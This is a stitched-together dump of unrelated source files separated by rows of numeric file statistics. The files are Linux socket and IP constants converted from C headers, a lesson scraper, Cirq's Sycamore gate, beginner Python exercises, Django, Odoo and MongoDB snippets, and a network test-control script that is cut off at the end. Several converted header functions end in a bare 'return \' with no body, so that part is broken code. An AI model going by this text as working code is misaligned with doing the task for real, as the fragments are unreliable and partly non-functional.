SIOCSMIIREG = 0x8949
SIOCWANDEV = 0x894A
SIOCDARP = 0x8953
SIOCGARP = 0x8954
SIOCSARP = 0x8955
SIOCDRARP = 0x8960
SIOCGRARP = 0x8961
SIOCSRARP = 0x8962
SIOCGIFMAP = 0x8970
SIOCSIFMAP = 0x8971
SIOCADDDLCI = 0x8980
SIOCDELDLCI = 0x8981
SIOCGIFVLAN = 0x8982
SIOCSIFVLAN = 0x8983
SIOCBONDENSLAVE = 0x8990
SIOCBONDRELEASE = 0x8991
SIOCBONDSETHWADDR = 0x8992
SIOCBONDSLAVEINFOQUERY = 0x8993
SIOCBONDINFOQUERY = 0x8994
SIOCBONDCHANGEACTIVE = 0x8995
SIOCBRADDBR = 0x89a0
SIOCBRDELBR = 0x89a1
SIOCBRADDIF = 0x89a2
SIOCBRDELIF = 0x89a3
SIOCDEVPRIVATE = 0x89F0
SIOCPROTOPRIVATE = 0x89E0
# Included from asm/sockios.h
FIOSETOWN = 0x8901
SIOCSPGRP = 0x8902
FIOGETOWN = 0x8903
SOL_SOCKET = 1
SO_DEBUG = 1
SO_REUSEADDR = 2
SO_TYPE = 3
SO_ERROR = 4
SO_DONTROUTE = 5
SO_BROADCAST = 6
SO_SNDBUF = 7
SO_RCVBUF = 8
SO_KEEPALIVE = 9
SO_OOBINLINE = 10
SO_NO_CHECK = 11
SO_PRIORITY = 12
SO_LINGER = 13
SO_BSDCOMPAT = 14
SO_PASSCRED = 16
SO_PEERCRED = 17
SO_RCVLOWAT = 18
SO_SNDLOWAT = 19
SO_RCVTIMEO = 20
SO_SNDTIMEO = 21
SO_SECURITY_AUTHENTICATION = 22
SO_SECURITY_ENCRYPTION_TRANSPORT = 23
SO_SECURITY_ENCRYPTION_NETWORK = 24
SO_BINDTODEVICE = 25
SO_ATTACH_FILTER = 26
SO_DETACH_FILTER = 27
SO_PEERNAME = 28
SO_TIMESTAMP = 29
SCM_TIMESTAMP = SO_TIMESTAMP
SO_ACCEPTCONN = 30
SOCK_STREAM = 1
SOCK_DGRAM = 2
SOCK_RAW = 3
SOCK_RDM = 4
SOCK_SEQPACKET = 5
SOCK_PACKET = 10
SOCK_MAX = (SOCK_PACKET+1)
# Included from bits/in.h
IP_TOS = 1
IP_TTL = 2
IP_HDRINCL = 3
IP_OPTIONS = 4
IP_ROUTER_ALERT = 5
IP_RECVOPTS = 6
IP_RETOPTS = 7
IP_PKTINFO = 8
IP_PKTOPTIONS = 9
IP_PMTUDISC = 10
IP_MTU_DISCOVER = 10
IP_RECVERR = 11
IP_RECVTTL = 12
IP_RECVTOS = 13
IP_MULTICAST_IF = 32
IP_MULTICAST_TTL = 33
IP_MULTICAST_LOOP = 34
IP_ADD_MEMBERSHIP = 35
IP_DROP_MEMBERSHIP = 36
IP_RECVRETOPTS = IP_RETOPTS
IP_PMTUDISC_DONT = 0
IP_PMTUDISC_WANT = 1
IP_PMTUDISC_DO = 2
SOL_IP = 0
IP_DEFAULT_MULTICAST_TTL = 1
IP_DEFAULT_MULTICAST_LOOP = 1
IP_MAX_MEMBERSHIPS = 20
IPV6_ADDRFORM = 1
IPV6_PKTINFO = 2
IPV6_HOPOPTS = 3
IPV6_DSTOPTS = 4
IPV6_RTHDR = 5
IPV6_PKTOPTIONS = 6
IPV6_CHECKSUM = 7
IPV6_HOPLIMIT = 8
IPV6_NEXTHOP = 9
IPV6_AUTHHDR = 10
IPV6_UNICAST_HOPS = 16
IPV6_MULTICAST_IF = 17
IPV6_MULTICAST_HOPS = 18
IPV6_MULTICAST_LOOP = 19
IPV6_JOIN_GROUP = 20
IPV6_LEAVE_GROUP = 21
IPV6_ROUTER_ALERT = 22
IPV6_MTU_DISCOVER = 23
IPV6_MTU = 24
IPV6_RECVERR = 25
IPV6_RXHOPOPTS = IPV6_HOPOPTS
IPV6_RXDSTOPTS = IPV6_DSTOPTS
IPV6_ADD_MEMBERSHIP = IPV6_JOIN_GROUP
IPV6_DROP_MEMBERSHIP = IPV6_LEAVE_GROUP
IPV6_PMTUDISC_DONT = 0
IPV6_PMTUDISC_WANT = 1
IPV6_PMTUDISC_DO = 2
SOL_IPV6 = 41
SOL_ICMPV6 = 58
IPV6_RTHDR_LOOSE = 0
IPV6_RTHDR_STRICT = 1
IPV6_RTHDR_TYPE_0 = 0
# Included from endian.h
_ENDIAN_H = 1
__LITTLE_ENDIAN = 1234
__BIG_ENDIAN = 4321
__PDP_ENDIAN = 3412
# Included from bits/endian.h
__BYTE_ORDER = __LITTLE_ENDIAN
__FLOAT_WORD_ORDER = __BYTE_ORDER
LITTLE_ENDIAN = __LITTLE_ENDIAN
BIG_ENDIAN = __BIG_ENDIAN
PDP_ENDIAN = __PDP_ENDIAN
BYTE_ORDER = __BYTE_ORDER
# Included from bits/byteswap.h
_BITS_BYTESWAP_H = 1
def __bswap_constant_16(x): return \
def __bswap_16(x): return \
def __bswap_16(x): return __bswap_constant_16 (x)
def __bswap_constant_32(x): return \
def __bswap_32(x): return \
def __bswap_32(x): return \
def __bswap_32(x): return __bswap_constant_32 (x)
def __bswap_constant_64(x): return \
def __bswap_64(x): return \
def ntohl(x): return (x)
def ntohs(x): return (x)
def htonl(x): return (x)
def htons(x): return (x)
def ntohl(x): return __bswap_32 (x)
def ntohs(x): return __bswap_16 (x)
def htonl(x): return __bswap_32 (x)
def htons(x): return __bswap_16 (x)
def IN6_IS_ADDR_UNSPECIFIED(a): return \
def IN6_IS_ADDR_LOOPBACK(a): return \
def IN6_IS_ADDR_LINKLOCAL(a): return \
def IN6_IS_ADDR_SITELOCAL(a): return \
def IN6_IS_ADDR_V4MAPPED(a): return \
def IN6_IS_ADDR_V4COMPAT(a): return \
def IN6_IS_ADDR_MC_NODELOCAL(a): return \
def IN6_IS_ADDR_MC_LINKLOCAL(a): return \
def IN6_IS_ADDR_MC_SITELOCAL(a): return \
def IN6_IS_ADDR_MC_ORGLOCAL(a): return \
def IN6_IS_ADDR_MC_GLOBAL(a): return
| 21.241279 | 82 | 0.7785 | 2,346 | 14,614 | 4.369565 | 0.263853 | 0.029265 | 0.014047 | 0.015803 | 0.159302 | 0.126036 | 0.078236 | 0.036972 | 0.011804 | 0.011804 | 0 | 0.163005 | 0.140276 | 14,614 | 687 | 83 | 21.272198 | 0.652897 | 0.054263 | 0 | 0.081882 | 1 | 0 | 0 | 0 | 0 | 0 | 0.038945 | 0 | 0 | 0 | null | null | 0.001742 | 0.001742 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
726f291ded9370fe0d07065b7ca2045c9aafa63e | 718 | py | Python | classes/platzi_lesson.py | memowii/platzi_readme | a56fc73e4dc0964e17550a6683e82fd6c6604299 | [
"MIT"
] | null | null | null | classes/platzi_lesson.py | memowii/platzi_readme | a56fc73e4dc0964e17550a6683e82fd6c6604299 | [
"MIT"
] | null | null | null | classes/platzi_lesson.py | memowii/platzi_readme | a56fc73e4dc0964e17550a6683e82fd6c6604299 | [
"MIT"
] | null | null | null | import re
class PlatziLesson:
MINUTES_PATTERN = '(\d+):(\d+)'
HOST_NAME = 'https://platzi.com'
def __init__(self, soup_lesson):
self.lesson = soup_lesson
def get_link(self):
return PlatziLesson.HOST_NAME + self.lesson.a['href']
def get_title(self):
return self.lesson \
.select('.MaterialContent-title')[0] \
.text
def get_duration(self):
text_duration = self.lesson \
.select('.MaterialContent-duration')[0] \
.text
matches = re.search(PlatziLesson.MINUTES_PATTERN, text_duration)
text_minutes = matches.group(1)
return int(text_minutes) | 28.72 | 72 | 0.569638 | 76 | 718 | 5.157895 | 0.434211 | 0.102041 | 0.132653 | 0.158163 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00611 | 0.316156 | 718 | 25 | 73 | 28.72 | 0.792261 | 0 | 0 | 0.105263 | 0 | 0 | 0.111266 | 0.065369 | 0 | 0 | 0 | 0 | 0 | 1 | 0.210526 | false | 0 | 0.052632 | 0.105263 | 0.578947 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
727069f9bd77a7cf27d2611b96a0ac1c810cb344 | 68 | py | Python | actingweb/__init__.py | actingweb/box-actingweb | f586458484649aba927cd78c60b4d0fec7b82ca6 | [
"Apache-2.0"
] | null | null | null | actingweb/__init__.py | actingweb/box-actingweb | f586458484649aba927cd78c60b4d0fec7b82ca6 | [
"Apache-2.0"
] | null | null | null | actingweb/__init__.py | actingweb/box-actingweb | f586458484649aba927cd78c60b4d0fec7b82ca6 | [
"Apache-2.0"
] | null | null | null | __all__ = ["actor", "oauth", "auth", "property", "trust", "config"]
| 34 | 67 | 0.588235 | 7 | 68 | 5.142857 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 68 | 1 | 68 | 68 | 0.6 | 0 | 0 | 0 | 0 | 0 | 0.485294 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
72721fd7b9c143e6b89767efb0e7098fd83d11c9 | 2,153 | py | Python | cirq-google/cirq_google/ops/sycamore_gate.py | LLcat1217/Cirq | b88069f7b01457e592ad69d6b413642ef11a56b8 | [
"Apache-2.0"
] | 3,326 | 2018-07-18T23:17:21.000Z | 2022-03-29T22:28:24.000Z | cirq-google/cirq_google/ops/sycamore_gate.py | bradyb/Cirq | 610b0d4ea3a7862169610797266734c844ddcc1f | [
"Apache-2.0"
] | 3,443 | 2018-07-18T21:07:28.000Z | 2022-03-31T20:23:21.000Z | cirq-google/cirq_google/ops/sycamore_gate.py | bradyb/Cirq | 610b0d4ea3a7862169610797266734c844ddcc1f | [
"Apache-2.0"
] | 865 | 2018-07-18T23:30:24.000Z | 2022-03-30T11:43:23.000Z | # Copyright 2019 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""An instance of FSimGate that works naturally on Google's Sycamore chip"""
import numpy as np
import cirq
from cirq._doc import document
class SycamoreGate(cirq.FSimGate):
"""The Sycamore gate is a two-qubit gate equivalent to FSimGate(π/2, π/6).
The unitary of this gate is
[[1, 0, 0, 0],
[0, 0, -1j, 0],
[0, -1j, 0, 0],
[0, 0, 0, exp(- 1j * π/6)]]
This gate can be performed on the Google's Sycamore chip and
is close to the gates that were used to demonstrate quantum
supremacy used in this paper:
https://www.nature.com/articles/s41586-019-1666-5
"""
def __init__(self):
super().__init__(theta=np.pi / 2, phi=np.pi / 6)
def __repr__(self) -> str:
return 'cirq_google.SYC'
def __str__(self) -> str:
return 'SYC'
def _circuit_diagram_info_(self, args: cirq.CircuitDiagramInfoArgs):
return 'SYC', 'SYC'
def _json_dict_(self):
return cirq.obj_to_dict_helper(self, [])
SYC = SycamoreGate()
document(
SYC,
"""The Sycamore gate is a two-qubit gate equivalent to FSimGate(π/2, π/6).
The unitary of this gate is
[[1, 0, 0, 0],
[0, 0, -1j, 0],
[0, -1j, 0, 0],
[0, 0, 0, exp(- 1j * π/6)]]
This gate can be performed on the Google's Sycamore chip and
is close to the gates that were used to demonstrate quantum
supremacy used in this paper:
https://www.nature.com/articles/s41586-019-1666-5
""",
)
| 29.902778 | 78 | 0.633999 | 325 | 2,153 | 4.113846 | 0.393846 | 0.026926 | 0.026926 | 0.023934 | 0.390426 | 0.390426 | 0.390426 | 0.390426 | 0.390426 | 0.390426 | 0 | 0.046688 | 0.263818 | 2,153 | 71 | 79 | 30.323944 | 0.796845 | 0.477009 | 0 | 0 | 0 | 0 | 0.043796 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.263158 | false | 0 | 0.157895 | 0.210526 | 0.684211 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
727af29aa66db82c09a5a94a6c77b61afafe59a6 | 141 | py | Python | Guanabara/desafio16.py | manuellaAlvesVarella/python | eedb8362f0ebc8074f87d15c9e629e319ff29394 | [
"MIT"
] | 1 | 2022-03-25T20:42:20.000Z | 2022-03-25T20:42:20.000Z | Guanabara/desafio16.py | manuellaAlvesVarella/python | eedb8362f0ebc8074f87d15c9e629e319ff29394 | [
"MIT"
] | null | null | null | Guanabara/desafio16.py | manuellaAlvesVarella/python | eedb8362f0ebc8074f87d15c9e629e319ff29394 | [
"MIT"
] | null | null | null | import math
num = float(input('digite um número:'))
truc = math.trunc(num)
print ('O valor foi {} e a porção inteira é {}'.format(num,truc)) | 35.25 | 65 | 0.680851 | 24 | 141 | 4 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148936 | 141 | 4 | 65 | 35.25 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0.387324 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0.25 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
7299b95bd6767863f38639482a90267cfec70ef0 | 430 | py | Python | arend/backend/mongo.py | pyprogrammerblog/Arend | ed8a8edf95bde24bfdba29f6c77ac4fb546c7ba7 | [
"MIT"
] | null | null | null | arend/backend/mongo.py | pyprogrammerblog/Arend | ed8a8edf95bde24bfdba29f6c77ac4fb546c7ba7 | [
"MIT"
] | null | null | null | arend/backend/mongo.py | pyprogrammerblog/Arend | ed8a8edf95bde24bfdba29f6c77ac4fb546c7ba7 | [
"MIT"
] | null | null | null | from pymongo import MongoClient
from pymongo.collection import Collection
from arend.settings import base
class MongoTasksConnector:
def __init__(self):
self.db: MongoClient = MongoClient(base.mongodb_string)
self.task_collection: Collection = self.db[base.mongodb_arend_task_results]
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.db.close()
| 25.294118 | 83 | 0.732558 | 54 | 430 | 5.462963 | 0.481481 | 0.061017 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.193023 | 430 | 16 | 84 | 26.875 | 0.850144 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.272727 | false | 0 | 0.272727 | 0.090909 | 0.727273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
729d8dd6e04581384d38812f37e7566beaf83630 | 4,416 | py | Python | curriculum/06_data_01_analysis_2_DAYS/06_data_01_analysis_day_1/06_01_IMDB_sample_answers.py | google/teknowledge | aa55aa59c287f5fe3052e89d539f44252eee41a8 | [
"Apache-2.0"
] | 31 | 2017-11-11T09:10:57.000Z | 2021-10-13T22:53:57.000Z | curriculum/06_data_01_analysis_2_DAYS/06_data_01_analysis_day_1/06_01_IMDB_sample_answers.py | google/teknowledge | aa55aa59c287f5fe3052e89d539f44252eee41a8 | [
"Apache-2.0"
] | null | null | null | curriculum/06_data_01_analysis_2_DAYS/06_data_01_analysis_day_1/06_01_IMDB_sample_answers.py | google/teknowledge | aa55aa59c287f5fe3052e89d539f44252eee41a8 | [
"Apache-2.0"
] | 14 | 2017-11-10T02:19:42.000Z | 2021-10-13T22:53:47.000Z | from IMDBDatabase import IMDBData
# GUIDED PRACTICE
# Challenge 1.1 - The first step to data analysis is always to understand the
# database. Just like you can use a for loop to print all the elements in a list,
# use a for loop to print all the movieNames in IMDBData.
for movieName in IMDBData:
print(movieName)
# GUIDED PRACTICE
# Challenge 1.2 - Since IMDBData is a dictionary, you can access the data about
# a particular movie with IMDBData["Zootopia"]. Since each movie has a lot of
# data about it, it is also a dictionary. As you did in Challenge 1.1, use a
# for loop to print out all the characteristics that this database stores about
# a particular movie.
#
# Hint: Change the dictionary you are looping over in Challenge 1.1 to instead loop
# over the dictionary IMDBData["Zootopia"]
for attribute in IMDBData["Zootopia"]:
print(attribute)
# GUIDED PRACTICE
# Challenge 1.3 - Great, we now have an understanding of the data that is stored
# in the database! Let's see what that data is. For any one movie in the database,
# print out its stars, rating, genre, and year. An example of getting
# Zootopia's stars is below:
#
# print(IMDBData["Zootopia"]["Stars"])
print(IMDBData["Zootopia"]["Stars"])
print(IMDBData["Zootopia"]["Rating"])
print(IMDBData["Zootopia"]["Genre"])
print(IMDBData["Zootopia"]["Year"])
# GUIDED PRACTICE
# Challenge 1.4 - Now that you understand how the database is structured, let's
# look at the actual database! Open IMDBDatabase.py (NOT .pyc), and look at the
# information stored in the database and how it is structured.
# GUIDED PRACTICE
# Challenge 1.5 - Now let's start answering some questions about these movies.
# For starters, let us determine the highest rated movie in this database. Write
# a loop that goes over all the movies in the database, gets its rating,
# and prints the name and rating of the highest rated movie. Check your answer
# by looking at the actual database.
#
# Hint: You will need to have two variables, maxRating and maxRatedMovie,
# that keep track of the highest rated movie you have seen so far.
maxRating, maxRatedMovie = 0, ""
for movieName in IMDBData:
rating = IMDBData[movieName]["Rating"]
if (rating > maxRating):
maxRating = rating
maxRatedMovie = movieName
print(maxRatedMovie, " is the highest rated movie in the database, with rating ", maxRating)
# Challenge 1.6 - Now let's find the oldest movie in the database. Write a loop
# that goes over every movie in the database, get its year, and ends up printing
# the name and year of the oldest movie. Check your answer by looking at the
# actual database.
#
# Hint: Like in Challenge 1.5, you will have to maintain two variables as you
# go through the loop. But this time, they will keep track of the oldestYear you
# have seen so far, and the name of the oldestMovie.
# Challenge 1.7 - Now let's find the number of Animation movies in the database.
# Write a loop that goes over every movie in the database, get its genre, and
# ends up printing the number of Animation movies. Check your answer by
# looking at the actual database.
#
# Hint: This time, you will have to maintain one variable, which represents the
# number of Animation movies you have seen so far.
# BONUS Challenge 1.8 - As you saw above, the "Stars" attribute of a movie is a
# list of strings. It contains the names of the actors/actresses in the movie.
# Write a loop that determines how many of the movies in this database "Tom Hanks"
# has acted in. Check your answer by looking at the actual database.
#
# Hint 1: Like in Challenge 1.5, you will have to loop over the list and have an
# if statement in the loop. But this time, your if statement wants to check
# whether the string "Tom Hanks" is in movieName's stars list.
#
# Hint 2: In Challenge 1.5, you had to keep one variable that keeps track of the
# highest rated movie you have seen so far. Similarly, in this question you
# will have to maintain one variable that keeps track of the number of Tom Hanks
# movies you have encountered so far in your loop.
# BONUS Challenge 1.9 - In Challenge 1.6, you wrote code to determine the number
# of Tom Hanks movies in the database. Now, modify it so that you can type a name in,
# and it will tell you the number of movies by that actor/actress in the database.
# Check your answer by looking at the actual database.
#
# Hint: Remember input()?
| 42.057143 | 92 | 0.747509 | 743 | 4,416 | 4.442799 | 0.250336 | 0.045441 | 0.04332 | 0.034535 | 0.342623 | 0.253862 | 0.234171 | 0.171766 | 0.157225 | 0.139049 | 0 | 0.009208 | 0.188406 | 4,416 | 104 | 93 | 42.461538 | 0.91183 | 0.834239 | 0 | 0.125 | 0 | 0 | 0.185241 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.0625 | 0 | 0.0625 | 0.4375 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
729fa14b665bd38ca8975f8f6740976f9cc8697f | 129 | py | Python | testproject/testapp/urls.py | shahabaz/quickstartup | e351138580d3b332aa309d5d98d562a1ebef5c2c | [
"MIT"
] | 13 | 2015-06-10T03:29:15.000Z | 2021-10-01T22:06:48.000Z | testproject/testapp/urls.py | shahabaz/quickstartup | e351138580d3b332aa309d5d98d562a1ebef5c2c | [
"MIT"
] | 47 | 2015-06-10T03:26:18.000Z | 2021-09-22T17:35:24.000Z | testproject/testapp/urls.py | shahabaz/quickstartup | e351138580d3b332aa309d5d98d562a1ebef5c2c | [
"MIT"
] | 3 | 2015-07-07T23:55:39.000Z | 2020-04-18T10:34:53.000Z | from django.urls import path
from .views import index
app_name = "app"
urlpatterns = [
path("", index, name="index"),
]
| 10.75 | 34 | 0.651163 | 17 | 129 | 4.882353 | 0.588235 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.209302 | 129 | 11 | 35 | 11.727273 | 0.813725 | 0 | 0 | 0 | 0 | 0 | 0.062016 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
72a3b8fb125b17512a0b19a04afd3ae8e6f6f27f | 542 | py | Python | addons/po_persian_calendar/globals.py | apadanagroup/parOdoo | 8c6f67848e0689b76fb780feca08d819fd3c1847 | [
"Apache-2.0"
] | 12 | 2021-03-26T08:39:40.000Z | 2022-03-16T02:20:10.000Z | addons/po_persian_calendar/globals.py | apadanagroup/parOdoo | 8c6f67848e0689b76fb780feca08d819fd3c1847 | [
"Apache-2.0"
] | 13 | 2020-12-20T16:00:21.000Z | 2022-03-14T14:55:30.000Z | addons/po_persian_calendar/globals.py | apadanagroup/parOdoo | 8c6f67848e0689b76fb780feca08d819fd3c1847 | [
"Apache-2.0"
] | 17 | 2020-08-31T11:18:49.000Z | 2022-02-09T05:57:31.000Z | from odoo import models, fields, api
from typing import TYPE_CHECKING, Any, List, Dict
import logging
#from .models.parnian_translation_branch import ParnianTranslationBranch
if TYPE_CHECKING:
from odoo.addons.base.models.res_partner import Partner
from odoo.addons.base.models.ir_http import IrHttp
from odoo.addons.web.models.ir_http import Http
from odoo.addons.base.models.res_users import Users
else:
Partner = models.Model
IrHttp = models.AbstractModel
Http = models.AbstractModel
Users = models.Model
| 31.882353 | 72 | 0.782288 | 75 | 542 | 5.546667 | 0.4 | 0.096154 | 0.134615 | 0.129808 | 0.1875 | 0.129808 | 0 | 0 | 0 | 0 | 0 | 0 | 0.154982 | 542 | 16 | 73 | 33.875 | 0.908297 | 0.130996 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.538462 | 0 | 0.538462 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
72a46a92b94c70fd5a38b1813c62da37379a390a | 6,893 | py | Python | Source Code/control panel/contorl.py | PerryLai/AutoTest-Platform | 798e797149dfdbc975131c3f95cc887e29594182 | [
"MIT"
] | null | null | null | Source Code/control panel/contorl.py | PerryLai/AutoTest-Platform | 798e797149dfdbc975131c3f95cc887e29594182 | [
"MIT"
] | null | null | null | Source Code/control panel/contorl.py | PerryLai/AutoTest-Platform | 798e797149dfdbc975131c3f95cc887e29594182 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding:utf-8 -*-
import sup
import os
import shutil
import time
### Config Setting ###
# 設定檔位址
ip_config = 'D:\\CN5SW1\\Desktop\\AutoTest Platform\\config\\ip_config.ini'
fw_config = 'D:\\CN5SW1\\Desktop\\AutoTest Platform\\config\\fw_config.ini'
switch_config = 'D:\\CN5SW1\\Desktop\\AutoTest Platform\\config\\switch_config.ini'
control_config = 'D:\\CN5SW1\\Desktop\\AutoTest Platform\\config\\control_config.ini'
testcase_config = 'D:\\CN5SW1\\Desktop\\AutoTest Platform\\config\\testcase_config.ini'
# 要寄到client自動測試的檔案們
main = sup.config_file(control_config, "Client", "main")
set_netns_net0 = sup.config_file(control_config, "Client", "set_netns_net0")
set_netns_net1 = sup.config_file(control_config, "Client", "set_netns_net1")
test_program_folder = sup.config_file(control_config, "Client", "test_program_folder")
test_program_path = sup.config_file(control_config, "Client", "test_program_path")
test_program = sup.config_file(control_config, "Client", "test_program")
packet_capture = sup.config_file(control_config, "Client", "packet_capture")
#壓縮
zip_dir_srcPath = sup.config_file(control_config, "Control Panel", "zip_dir_srcPath")
zip_dir_dstname = sup.config_file(control_config, "Control Panel", "zip_dir_dstname")
# 所有從client回傳的資料統整在這個資料夾
testcase_path = sup.config_file(control_config, "Control Panel", "testcase_path")
### Client address ###
main_client = sup.config_file(control_config, "Control Panel", "main_client")
source_code_client = sup.config_file(control_config, "Control Panel", "source_code_client")
### Server address ###
main_local = sup.config_file(control_config, "Control Panel", "main_local")
source_code_local = sup.config_file(control_config, "Control Panel", "source_code_local")
result_client=sup.config_file(control_config, "Control Panel", "result_client") #/home/pi/Desktop/Result.zip
result_local=sup.config_file(control_config, "Control Panel", "result_local") #D:\CN5SW1\Desktop\\Result
### 解壓縮路徑 ###
unzip_dir_srcName = sup.config_file(control_config, "Control Panel", "unzip_dir_srcName")
unzip_dir_dstPath = sup.config_file(control_config, "Control Panel", "unzip_dir_dstPath")
### 外部程式 ###
analyze = sup.config_file(control_config, "Control Panel", "analyze")
cle = sup.config_file(control_config, "Control Panel", "cle") # 這是程式路徑
# 初始化所有testcase Result資料夾
testcase_file_num = len([name for name in os.listdir(testcase_path) if os.path.isdir(os.path.join(testcase_path, name))])
for i in range(testcase_file_num-1):
i=i+1
Result_dir = "%s\\testcase\\Result%r" %(sup.config_file(control_config, "Control Panel", "AutoTest_Path"),i)
shutil.rmtree(Result_dir)
if not os.path.isdir(Result_dir):
os.mkdir(Result_dir)
ip_nums = len(sup.config_file_all_title(ip_config))
# 主程式
for i in range(ip_nums):
i=i+1
print ('i = %s'%i)
### 設定IP ###
sup.alter_ip_to_config(control_config, ip_config,i) # ip_list.ini -> control_config
sup.alter_config_to_set_netns_net0(control_config, set_netns_net0) # 抓config的資料到set_netns_net0
sup.alter_config_to_set_netns_net1(control_config, set_netns_net1) # 抓config的資料到set_netns_net1
sup.alter(test_program_path, 0, 0, control_config, "Client", "test_program") # 抓config的資料到test_program.txt
#sup.alter(packet_capture, 30, 8, control_config, "Client", "packet_catch_num") # 抓config設定的擷取封包數到packet_capture.sh
#sup.alter(packet_capture, 29, 8, control_config, "Client", "packet_catch_num") # 抓config設定的擷取封包數到packet_capture.sh
#sup.alter("%s\\%s"%(test_program_folder,test_program), 6, 10, control_config, "Client", "packet_ping_num") # 抓config設定的打封包數到packet_transfer_program,若有修改務必改掉參數
### 設定FW ###
sup.alter_fw_to_config(control_config,fw_config,i)# fw_config.ini -> control_config.ini
fw_bin = sup.config_file(control_config, "Firmware config", "Firmware_config") # 這是待測Fw檔名
sup.cle_set(cle,fw_bin)
### Switch ###
sup.alter_sw_to_config(control_config,switch_config,i)# sw_config.ini -> control_config.ini
HOST = sup.config_file(control_config, "switch", "HOST")
USER = sup.config_file(control_config, "switch", "USER")
PASSWORD = sup.config_file(control_config, "switch", "PASSWORD")
PORT = sup.config_file(control_config, "switch", "PORT")
CP_normal = sup.config_file(control_config, "switch", "CP_normal")
CP_fixed = sup.config_file(control_config, "switch", "CP_fixed")
CP_forbidden = sup.config_file(control_config, "switch", "CP_forbidden")
PC1_vlan = sup.config_file(control_config, "switch", "PC1_vlan")
PC1_normal = sup.config_file(control_config, "switch", "PC1_normal")
PC1_fixed = sup.config_file(control_config, "switch", "PC1_fixed")
PC1_forbidden = sup.config_file(control_config, "switch", "PC1_forbidden")
PC2_vlan = sup.config_file(control_config, "switch", "PC2_vlan")
PC2_normal = sup.config_file(control_config, "switch", "PC2_normal")
PC2_fixed = sup.config_file(control_config, "switch", "PC2_fixed")
PC2_forbidden = sup.config_file(control_config, "switch", "PC2_forbidden")
sup.switch_portset(HOST,USER,PASSWORD,PORT,'1',CP_normal,CP_fixed,CP_forbidden) # switch 對 CP default 的 vlan 就是 1
